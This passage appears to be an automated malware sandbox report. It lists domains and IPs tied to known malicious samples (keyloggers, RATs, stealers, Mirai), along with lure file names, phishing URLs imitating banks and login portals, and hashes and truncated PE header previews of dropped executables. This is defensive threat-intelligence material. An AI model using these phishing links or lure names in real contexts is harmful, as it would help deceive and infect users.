                                                                                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                                                                                    TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                                                                                    13.248.148.254HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                    • ww12.przvgke.biz/snsobwmcccpnrm?usid=25&utid=8132647334
                                                                                                                                                                                                                                    PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                    • ww12.przvgke.biz/fauopp?usid=18&utid=28672494417
                                                                                                                                                                                                                                    Ziraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                    • ww12.przvgke.biz/jenyp?usid=26&utid=9204704395
                                                                                                                                                                                                                                    http://begantotireo.xyzGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • ww38.begantotireo.xyz/favicon.ico
                                                                                                                                                                                                                                    http://begantotireo.xyzGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • ww38.begantotireo.xyz/favicon.ico
                                                                                                                                                                                                                                    http://football-booster.freevisit1.com/hs-football.php?live=Greendale%20vs%20Milwaukee%20LutheranGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • ww38.watchdogsecurity.online/favicon.ico
                                                                                                                                                                                                                                    65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeGet hashmaliciousBdaejec, SocelarsBrowse
                                                                                                                                                                                                                                    • ww12.icodeps.com/?usid=26&utid=7334446481
                                                                                                                                                                                                                                    eqqjbbjMlt.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • ww38.fmoovies.to/
                                                                                                                                                                                                                                    http://www.multipool.usGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • ww12.multipool.us/track.php?domain=multipool.us&caf=1&toggle=answercheck&answer=yes&uid=MTcyMDYyMjM5MS4yMjM1OjVjOTE5YWZmN2E1ZDQyNWY5MDE0Nzg0YzIwZGI1NzNiMGZkYzI3MWFiMWE0MGU0NzBjYjkyZjk4MmNlNjdjZDI6NjY4ZTlkMzczNjkwYg%3D%3D
                                                                                                                                                                                                                                    http://pollyfill.ioGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • ww38.pollyfill.io/favicon.ico
                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    jpskm.bizinvoice_96.73.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                    • 18.246.231.120
                                                                                                                                                                                                                                    Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                    • 18.246.231.120
                                                                                                                                                                                                                                    C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                                    • 34.211.97.45
                                                                                                                                                                                                                                    IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                                    • 34.211.97.45
                                                                                                                                                                                                                                    Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                                    • 34.211.97.45
                                                                                                                                                                                                                                    Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                                    • 34.211.97.45
                                                                                                                                                                                                                                    AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                    • 34.211.97.45
                                                                                                                                                                                                                                    E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                                                                                                                                                    • 34.211.97.45
                                                                                                                                                                                                                                    Y2EM7suNV5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                    • 34.211.97.45
                                                                                                                                                                                                                                    AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 34.211.97.45
                                                                                                                                                                                                                                    oshhkdluh.bizinvoice_96.73.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                    • 54.244.188.177
                                                                                                                                                                                                                                    Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                    • 54.244.188.177
                                                                                                                                                                                                                                    C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                                    • 54.244.188.177
                                                                                                                                                                                                                                    IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                                    • 54.244.188.177
                                                                                                                                                                                                                                    Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                                    • 54.244.188.177
                                                                                                                                                                                                                                    Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                                    • 54.244.188.177
                                                                                                                                                                                                                                    AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                    • 54.244.188.177
                                                                                                                                                                                                                                    E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                                                                                                                                                    • 54.244.188.177
                                                                                                                                                                                                                                    Y2EM7suNV5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                    • 54.244.188.177
                                                                                                                                                                                                                                    AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 54.244.188.177
                                                                                                                                                                                                                                    76899.bodis.comREQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                    • 199.59.243.227
                                                                                                                                                                                                                                    HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                    • 199.59.243.227
                                                                                                                                                                                                                                    PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                    • 199.59.243.227
                                                                                                                                                                                                                                    Ziraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                    • 199.59.243.227
                                                                                                                                                                                                                                    http://readabilityscore.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 199.59.243.226
                                                                                                                                                                                                                                    http://bonalluterser.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 199.59.243.226
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Stealc, XmrigBrowse
                                                                                                                                                                                                                                    • 199.59.243.225
                                                                                                                                                                                                                                    S23UhdW5DH.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                                                                                                    • 199.59.243.225
                                                                                                                                                                                                                                    xPUqa4qbDL.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 199.59.242.153
                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    UTMEMUSRequested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                    • 132.226.247.73
                                                                                                                                                                                                                                    Dotc67890990.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                                    • 132.226.247.73
                                                                                                                                                                                                                                    Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                    • 132.226.8.169
                                                                                                                                                                                                                                    PARATRANSFARI REMINDER.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                                    • 132.226.8.169
                                                                                                                                                                                                                                    Invoice DHL - AWB 2024 E4001 - 0000731.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                                    • 132.226.247.73
                                                                                                                                                                                                                                    PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                    • 132.226.247.73
                                                                                                                                                                                                                                    F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                                                                                    • 132.226.8.169
                                                                                                                                                                                                                                    D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                                                                                    • 132.226.247.73
                                                                                                                                                                                                                                    0001.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                                    • 132.226.247.73
                                                                                                                                                                                                                                    Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                    • 132.226.247.73
                                                                                                                                                                                                                                    AMAZON-AESUShttp://ghostbin.cafe24.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 44.199.56.69
                                                                                                                                                                                                                                    Set-up.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 52.202.253.164
                                                                                                                                                                                                                                    kwari.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 54.226.65.111
                                                                                                                                                                                                                                    Set-up.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 34.197.122.172
                                                                                                                                                                                                                                    https://employeeportal.net-login.com/XL0pFWEloTnBYUmM5TnBUSmVpbWxiSUpWb3BBL1lPY1hwYU5uYktNWkd5ME82bWJMcUhoRklFUWJiVmFOUi9uUS81dGZ4dnJZYkltK2NMZG5BV1pmbFhqMXNZcm1QeXBXTXI4R090NHo5NWhuL2l4TXdxNlY4VlZxWHVPNTdnc1M3aU4xWjhFTmJiTEJWVUYydWVqZjNPbnFkM3M5T0FNQ2lRL3EySjhvdVVDNzZ2UHJQb0xQdlhZbTZRPT0tLTJaT0Z2TlJ3S0NMTTZjc2ktLTZGNUIwRnVkbFRTTHR2dUFITkcxVFE9PQ==?cid=2341891188Get hashmaliciousKnowBe4Browse
                                                                                                                                                                                                                                    • 3.88.121.169
                                                                                                                                                                                                                                    https://chase.com-onlinebanking.com/XWmJkMGsxak5lZzdVZUczR3RxTGFWN1g0Q2NKLy96RURPVEpZbEdkOC9nQzY1TStZSjU0T0x4Q05qOXZBRHZnZTZpMmh2eGFmSm9rcVRmV2xBeENiMEF1V3VTOVAvL2dKemVQZkZGNHAxQ1hqTU9WY0R5SGpYeDQ3UVNtNGZpWDJYdWxBUFY5OUFVc3VFU041aHl6aUxrMlBZaGs1Y25BV0xHL1Vhc1BYNVQ5d3laZ2piV3gvTjlUMmc3QWV4QUs2Q0h6Yi0tZ1lEV1pac1JHRzl5ZFpFaC0tcVVpc09xQzZsUzY0bzY0YWpuS1N2Zz09?cid=2342337857Get hashmaliciousKnowBe4Browse
                                                                                                                                                                                                                                    • 3.88.121.169
                                                                                                                                                                                                                                    securedoc_20241220T111852.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 44.219.110.92
                                                                                                                                                                                                                                    https://visa-pwr.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 3.208.228.173
                                                                                                                                                                                                                                    botx.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                    • 52.0.196.218
                                                                                                                                                                                                                                    botx.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                    • 34.206.198.108
                                                                                                                                                                                                                                    AMAZON-02US25F.tmp.exeGet hashmaliciousDarkbotBrowse
                                                                                                                                                                                                                                    • 18.244.18.38
                                                                                                                                                                                                                                    chernobyl.arm7.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                                                                    • 54.171.230.55
                                                                                                                                                                                                                                    DIS_37745672.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                                                                                                                                                                                    • 34.241.139.243
                                                                                                                                                                                                                                    ARMV7L.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                    • 54.247.62.1
                                                                                                                                                                                                                                    systempreter.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                                                                                    • 3.69.157.220
                                                                                                                                                                                                                                    http://ghostbin.cafe24.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 13.32.99.103
                                                                                                                                                                                                                                    rjnven64.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                    • 54.171.230.55
                                                                                                                                                                                                                                    https://gogl.to/3HGTGet hashmaliciousCAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRATBrowse
                                                                                                                                                                                                                                    • 18.245.31.129
                                                                                                                                                                                                                                    Epsilon.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 185.166.143.48
                                                                                                                                                                                                                                    boatnet.arm6.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                    • 34.249.145.219
                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    54328bd36c14bd82ddaa0c04b25ed9adRtU8kXPnKr.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                    PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                    Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                    Dotc67890990.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                    INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                    Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                    HALKBANK EKSTRE.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                    EPIRTURMEROOO0060.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                    Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                    Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1353216
                                                                                                                                                                                                                                    Entropy (8bit):5.3243783935455875
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:3C4VQjGARQNhixXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:3OCAR0ixsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                    MD5:B51557B7A9F166D7BF857730D65E08D3
                                                                                                                                                                                                                                    SHA1:1D25A37FFB5A6EFF93B94059ABDCC1C2C8103F17
                                                                                                                                                                                                                                    SHA-256:6C7E3C401957A4BF61E17AB3E7F49F344E9E7968AF6D5E555EA9E7841956CA64
                                                                                                                                                                                                                                    SHA-512:8CF9171F9357D32B614EA8086F6D512A76FC3FF8FF24CD2399335BC918843B5E946FEF1D6B6192A2F488A4AA826C56A7386296147575D933DB5A60600A8A39A5
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.~.2.-.2.-.2.-n.G-.2.-n.E-J2.-n.D-.2.-.Z.,.2.-.Z.,.2.-.Z.,.2.-.J%-.2.-.2.-.2.-.[.,.2.-.[I-.2.-.2!-.2.-.[.,.2.-Rich.2.-........................PE..L...g.(c.....................6......&........0....@...........................!.....A.......................................,b..<....p...............................L..8............................L..@............0..,............................text............................... ..`.rdata...8...0...:..."..............@..@.data........p.......\..............@....rsrc....P...p...@...f..............@...................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1294848
                                                                                                                                                                                                                                    Entropy (8bit):5.2826917412348
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:ENUpaKghKXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:ECMKg4sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                    MD5:28C24747652CD266E161AB628D35BE9D
                                                                                                                                                                                                                                    SHA1:9DE9B5B066DB850911D3B1B4334F0489317A563A
                                                                                                                                                                                                                                    SHA-256:CE4748FB13910E917B22E0A3BA0A2C1406848D429283F5424D50F591AC39A53E
                                                                                                                                                                                                                                    SHA-512:699B559A2CA178B511ACF8FDF5BD8884F04BACD18F3BEDB25888C3B61CAD37823A5C3B1DA0C44CE264519E3C4924F6A861E24AD909BC993EA2EB04A335DB5666
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........jZ..9Z..9Z..9...9Q..9...9%..9...9B..9...8r..9...8K..9...8H..9S.x9W..9Z..9..9...8]..9...9[..9Z.|9[..9...8[..9RichZ..9........PE..L...C.(c.........."......:...........\.......P....@........................... .............................................$...........0..............................8...............................@............P...............................text...19.......:.................. ..`.rdata...|...P...~...>..............@..@.data...............................@....rsrc...0...........................@..@.reloc...`...`...P...r..............@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1314304
                                                                                                                                                                                                                                    Entropy (8bit):5.274131544052398
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:9MEhwdbT9Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:7KdH9sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                    MD5:815B2CB2DA48F77E0B0C22B2EA859BFB
                                                                                                                                                                                                                                    SHA1:8285F5B21F363B600DAA2049958C207E7BFED9A9
                                                                                                                                                                                                                                    SHA-256:267F6294917B66B019512BA89B61F0A2657879314A3115B1CB6ABA87E5C044F0
                                                                                                                                                                                                                                    SHA-512:2302B5643097A74A62A4F4F1F2F67A7447C5EFC26598D8EEA6278310A74C00129F1931CA144B26842C0E6C62E75BACF8A10853202535A4293BF956D91EE6044B
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9..X...X...X..-....X..-....X..-....X...0...X...0...X...0...X... n..X...X..YX..<1.X..<1...X...Xj..X..<1...X..Rich.X..........................PE..d...G.(c.........."......J...^......Tr.........@............................. !........... .................................................,........ ..0...............................8............................................`..`............................text....H.......J.................. ..`.rdata.......`.......N..............@..@.data........ ......................@....pdata..............................@..@.rsrc...0.... ......."..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):2203136
                                                                                                                                                                                                                                    Entropy (8bit):7.647025538647812
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:49152:1K0eqkSR7Xgo4TiRPnLWvJZDmg27RnWGj:1K0pR7Xn4TiRCvJZD527BWG
                                                                                                                                                                                                                                    MD5:9BDF8C2D8537333CB1A57824C9BFBFCA
                                                                                                                                                                                                                                    SHA1:2942EBFA5DA987889E5CFB5B4A26B94A4C5A848C
                                                                                                                                                                                                                                    SHA-256:C756FC4DFC1542C2A8795D6B2C878E7C234266F5BE40E4B46E190B11FA0A51ED
                                                                                                                                                                                                                                    SHA-512:C44ACBDC9E063D6563FEB7648A7FBFC63B4B007387F7C1660B74A64BD652DACD20E0D91199B7FB38DE92D7A04B090CAA5E83D890EB3B1363FCD3723DA394C326
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................Y;6....Y;4.x...Y;5...........................D......T...........H......H.8.....P....H......Rich...................PE..L...9.(c..........#..................d............@..........................."......v"..............................................p..X...............................p...............................@...............X............................text.............................. ..`.rdata..$H.......J..................@..@.data....@... ......................@....rsrc........p......................@...................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):2369024
                                                                                                                                                                                                                                    Entropy (8bit):7.565047176470713
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:49152:AfYP1JsEDkSR7Xgo4TiRPnLWvJZDmg27RnWGj:QYPBR7Xn4TiRCvJZD527BWG
                                                                                                                                                                                                                                    MD5:E1791F81FCDC3B734745D5C56EB688DB
                                                                                                                                                                                                                                    SHA1:EE8A6C49B6AA3F3C1A79A1181862B6147369B607
                                                                                                                                                                                                                                    SHA-256:D21285BF7EDADC05E5134E4E306AA249AE6E1FB87C9A324D295D7322FF49FFA8
                                                                                                                                                                                                                                    SHA-512:952FB95C2540DD1AE00F67A02C5E99EE1987B0647ADA8C01337F4F587E2F4C2ABDEB63FDB55E8C67E659F4D596FE5BA2E50A006886A743B8ECAF52CD5DFB904E
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<y..x...x...x....~.s....|......}.a...*p..i...*p..p...*p..H...q`..z...q`..a...x...s....q..[....qp.y...x...z....q..y...Richx...........PE..d...>.(c..........#..........0......(..........@..............................$.......$... .............................................................X........e...................n..p...................0p..(...0o...............0...............................text............................... ..`.rdata.......0......."..............@..@.data....R...0... ... ..............@....pdata...e.......f...@..............@..@.rsrc...............................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1245184
                                                                                                                                                                                                                                    Entropy (8bit):5.123559268796299
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:W62SYUcknnXXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:rYUcknXsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                    MD5:0F8BF28FC502AF52D68F01E061884ED5
                                                                                                                                                                                                                                    SHA1:78526E26EFAF743A528D09E508AE73656533660E
                                                                                                                                                                                                                                    SHA-256:E939A88B78211EEA1BF61CE0A1411A193BAFEA707F0B087E7896E75B0172B0D1
                                                                                                                                                                                                                                    SHA-512:570CB43F9FBF8651363ABC9CD240BDA311223F7777110CF61FEE2A24381DD0370B432E94E93371A2F708A41377EDA58826F6F90EAD49A1EC3DAE516AB4E6E978
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[m..5>..5>..5>OC.>..5>OC.>..5>OC.>..5>..0?..5>..1?..5>..6?..5>.>..5>..4>..5>.>..5>^.<?..5>^..>..5>..>..5>^.7?..5>Rich..5>........................PE..L.....(c..........................................@..........................@...............................................%..d....P.................................8...............................@...............t............................text.............................. ..`.rdata...^.......`..................@..@.data...l....0....... ..............@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1640448
                                                                                                                                                                                                                                    Entropy (8bit):7.1666554275631595
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:49152:9+iAqSPyC+NltpScpzbtvpJoMQSq/jrQaSdDmg27RnWGj:PSktbprD527BWG
                                                                                                                                                                                                                                    MD5:25A463CE5F86688F024BBE26A7774DDD
                                                                                                                                                                                                                                    SHA1:2959C508D2AF90852DBF3FD1817E9E97C7B62E8E
                                                                                                                                                                                                                                    SHA-256:A2C1B33947E62D26DDBC371564EFEC9B1823BFB18638F53735909134D693A7A5
                                                                                                                                                                                                                                    SHA-512:F041A8957F3CD344FDFCDA1B8CB065AA3AB28FB9F02B47171DC7ADC29F0602C4489C0BC0B8503E8CD1ECDCB01B70EA998318F70A651A5217F07A1A5E85B2B8ED
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......}0tp9Q.#9Q.#9Q.#...#,Q.#...#.Q.#...#.Q.#...#8Q.#k9.".Q.#k9."(Q.#k9."1Q.#0).#1Q.#0).#8Q.#0).#.Q.#9Q.#.S.#.8."hQ.#.8."8Q.#.8.#8Q.#9Q.#;Q.#.8."8Q.#Rich9Q.#........PE..d...3.(c.........."......H...*.......Z.........@.......................................... ...@...............@..............................l..|.......P....P...o.................. .......................p...(...@................`..8............................text...<G.......H.................. ..`.rdata..|B...`...D...L..............@..@.data... ........P..................@....pdata...o...P...p..................@..@.rsrc...P............P..............@..@.reloc...............(..............@...................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):2953728
                                                                                                                                                                                                                                    Entropy (8bit):7.094618163404869
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:49152:cGSXoV72tpV9XE8Wwi1aCvYMdVluS/fYw44RxLWDmg27RnWGj:c4OEtwiICvYMRf2D527BWG
                                                                                                                                                                                                                                    MD5:2805CDDE7E1B60FEEB0D1E7AA9E9BC69
                                                                                                                                                                                                                                    SHA1:4B9B31ADA6B5572E9C6656C7CA9FE45ED45C4A8F
                                                                                                                                                                                                                                    SHA-256:323CAC74F3FF897F1F3FBF766CF5FCB74147D8CBE6B833BB6FA135EDFF850A92
                                                                                                                                                                                                                                    SHA-512:BCBD7C7741AA104C14190295318ABF97CEF7BB7B9440B439C0F7B14848305D837005DAC0338E645E82AEC63E2EC9D3A1410218E364A9CE54CCDDE20CDBC10512
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
